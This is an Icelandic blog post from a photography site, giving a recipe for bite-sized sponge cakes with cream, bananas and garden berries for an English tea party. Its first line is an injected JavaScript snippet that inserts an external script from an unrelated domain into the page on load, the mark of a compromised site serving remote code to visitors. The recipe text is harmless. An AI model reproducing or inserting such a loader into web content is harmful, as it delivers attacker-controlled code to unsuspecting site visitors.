;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Krúttkökur – Eydís — Ljósmyndun

Krúttkökur

Það var síðsumars og spúsi vildi halda enskt teboð.

Ég greip hugmyndina á lofti og ákvað að baka litlar kökur og smyrja gúrkusamlokur.
Kökurnar urðu algerar krúttkökur og komust léttilega fyrir í lófa manns.
Þetta er ákaflega auðvelt í framkvæmd og einstaklega ljúffengt. Hver biti er svo lítill og syndsamlegur.
Notaðu glas til að stinga út hringi úr svampbotnum. Þeyttu rjóma og settu smá möndlulíkjör eða möndludropa í hann. Sneiddu banana í sneiðar. Leggðu bananasneiðar á neðri svamphringinn, rjómann ofan á það og að lokum er seinni svamphringurinn settur ofan á. Ég bræddi súkkulaði og sullaði ofan á og skreytti með rifsberjum úr garðinum.Þessi fyrir ofan er með sama svampbotni en hérna marði ég hindber í rjómann. Setti örlítið ofan á og svo þessi pínulitlu jarðaber sem eru að lauma sér milli steina í garðinum hjá mér. Einfalt en gott. Svo er ómissandi að hafa girnilegt te með herlegheitunum. Dekka borð með blúndudúk og nota fína stellið. Það er bara synd og skömm ef blessað stellið er bara viðrað á hátíðsdögum.

Hér er uppskrift að einföldum en góðum svampbotnum- 2 stk meðalstórir
4 egg
200 gr sykur
60 gr kartöflumjöl
60 gr hveiti
1 tsk lyftiduft

Settu mjöl,hveiti og lyftiduft í skál. Þeyttu saman egg og sykur í hrærivél þangað til það verður létt og ljóst. Bættu þá þurrefnunum út í smátt og smátt. Smyrðu lausbotna form og helltu deiginu í þau.
Bakað í miðjum ofni við 175 gráður í 15-20 mínútur. Mismunandi eftir ofnum.
Það er hægt að stinga út 4-6 litla hringi úr hverjum botni, fer eftir því hve stórt glasið er að sjálfsögðu.

teboð

Leave a Reply

Your email address will not be published. Required fields are marked *